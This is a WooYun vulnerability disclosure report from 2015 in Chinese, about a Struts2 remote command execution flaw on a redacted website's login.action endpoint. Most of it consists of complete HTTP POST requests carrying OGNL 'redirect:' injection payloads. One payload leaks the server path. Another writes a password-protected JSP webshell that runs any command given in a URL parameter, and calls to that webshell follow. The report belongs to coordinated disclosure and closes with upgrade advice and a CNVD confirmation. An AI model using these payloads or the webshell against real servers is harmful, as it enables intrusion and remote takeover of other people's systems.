乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-04: 细节向公众公开
远程执行命令,可随意写入各种shell......
访问url:
http://**.**.**.**/home2/login.action
如下图:
看到.action路径,看看是否存在命令执行漏洞:
POST /home2/login.action HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: JSESSIONID=0000zixCFE_trjmZB_a0TslU7cF:17vj1u2gq; _gscu_168127336=50335137cn6lxp16; _gscbrs_168127336=1; Hm_lvt_3a9042c73cc61230a77e846d4576100c=1450255872,1450334437; Hm_lpvt_3a9042c73cc61230a77e846d4576100c=1450335494; aaaaaaa=b805003caaaaaaa_b805003cContent-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721Content-Length: 258--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"-1--------------------------5423a63046c50524a84963968721
执行成功,爆出服务器路径:
尝试写入webshell(excuteError.jsp):
POST /home2/login.action HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: JSESSIONID=0000zixCFE_trjmZB_a0TslU7cF:17vj1u2gq; _gscu_168127336=50335137cn6lxp16; _gscbrs_168127336=1; Hm_lvt_3a9042c73cc61230a77e846d4576100c=1450255872,1450334437; Hm_lpvt_3a9042c73cc61230a77e846d4576100c=1450335494; aaaaaaa=b805003caaaaaaa_b805003cContent-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721Content-Length: 680--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/opt/IBM/WebSphere/AppServerND/profiles/AppSrv01/installedApps/sxpt-03Cell01/idealpbw_20140618_war.ear/idealpbw_20140618.war/excuteError.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"-1--------------------------5423a63046c50524a84963968721
继续执行成功:
访问刚刚传上去的webshell,并执行系统命令回显:
http://**.**.**.**/home2/excuteError.jsp?pwd=023&i=ls%20/
http://**.**.**.**/home2/excuteError.jsp?pwd=023&i=ls%20/opt/IBM/WebSphere/AppServerND/profiles/AppSrv01/installedApps/sxpt-03Cell01/idealpbw_20140618_war.ear/idealpbw_20140618.war/
赶紧将struts2升级到最新版本吧!
危害等级:高
漏洞Rank:11
确认时间:2015-12-21 17:44
CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置.
暂无